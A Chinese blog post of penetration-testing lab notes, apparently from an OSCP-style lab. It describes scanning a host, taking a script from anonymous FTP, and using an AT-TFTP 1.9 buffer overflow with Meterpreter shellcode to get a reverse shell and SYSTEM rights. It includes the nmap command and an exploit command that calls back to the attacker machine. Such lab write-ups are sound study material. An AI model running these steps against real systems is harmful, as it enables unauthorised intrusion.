博客
关于我
渗透测试学习笔记之案例五
阅读量:146 次
发布时间:2019-02-28

本文共 781 字,大约阅读时间需要 2 分钟。

0x00 前言

今天这篇文章将分享一个渗透测试中的实际案例,展示从信息收集到最终获得目标主机控制的完整过程。

0x01 案例分析

实验环境

  • 目标靶机:10.11.1.0/24
  • 攻击机:Kali Linux(10.11.0.74)

渗透过程

开始进行服务和端口扫描:

# nmap -sT -Pn 10.11.1.226

扫描结果显示目标主机开放了ftp和RDP服务。初步测试发现,ftp服务支持匿名登录。

通过ftp服务,我们发现并下载了一个名为servers.py的Python脚本。进一步分析发现,该脚本用于启动ftp和tftp服务,具体涉及以下操作:

# cat servers.pyimport wmi, time, ftplib, tftpy

发现tftp漏洞

通过Google搜索,我们发现AT-TFTP 1.9存在一个缓冲区溢出漏洞(RCE)。利用Meterpreter反弹shell的生成工具,替换脚本中的shellcode代码,并运行:

# python atftp.py 10.11.1.226 69 10.11.0.74 9

最终,我们成功获得了一个Meterpreter反弹shell。

通过msf的反弹shell处理程序,迁移并提权至SYSTEM权限,完成渗透目标。

0x02 小结

该案例的渗透思路总结如下:

  • 服务和端口扫描:首先发现目标主机开放了ftp服务,并进一步确认tftp服务的存在。
  • 脚本分析:通过ftp下载并分析servers.py脚本,发现其用于启动ftp和tftp服务。
  • 漏洞利用:利用AT-TFTP 1.9的缓冲区溢出漏洞,生成Meterpreter反弹shell。
  • 反弹shell提权:通过msf反弹shell迁移进程并提权至SYSTEM权限。
  • 该案例展示了如何通过合理利用现有信息和漏洞,逐步实现渗透测试的目标。

    转载地址:http://cfgc.baihongyu.com/

    你可能感兴趣的文章
    Python基础 | 关于“循环”那些事
    查看>>
    python系列【仅供参考】:python之subprocess模块rsync拉取文件
    查看>>
    python系列【仅供参考】:python 远程rdp
    查看>>
    python基础
    查看>>
    Python基本语法与变量类型
    查看>>
    python基本数据类型(容器)- tuple list dict set
    查看>>
    python基本工资的调整方案_Python薪资又涨了!这可咋办!
    查看>>
    Python基准测试和性能分析内存管理和垃圾回收
    查看>>
    Python基于RESTful风格的接口自动化测试实战
    查看>>
    python基于pygame实现跨年烟花效果
    查看>>
    python基于flask搭建http服务(四)—— Docker容器化部署
    查看>>
    python基于flask搭建http服务(二)—— 实现Excel上传、数据清洗、入库
    查看>>
    python基于flask搭建http服务(三)—— 使用gunicorn部署项目
    查看>>
    python基于flask搭建http服务(一)—— 实现数据查询和Excel导出
    查看>>
    Python块键盘/鼠标输入
    查看>>
    Python在正确的时区获取当前时间
    查看>>
    python在心理学研究中的应用有哪些_心理学在线研究可用平台简介和应用进展
    查看>>
    python系列【仅供参考】:python tornado 集成redis消息订阅的异步任务之后tornado主程序无法启动,解决方案
    查看>>
    Python在列表理解中使用枚举
    查看>>
    python在使用HTMLTestRunner时,报告为空,错误提示<_io.TextIOWrapper name='<stderr>' mode='w' encoding='utf_8'>...
    查看>>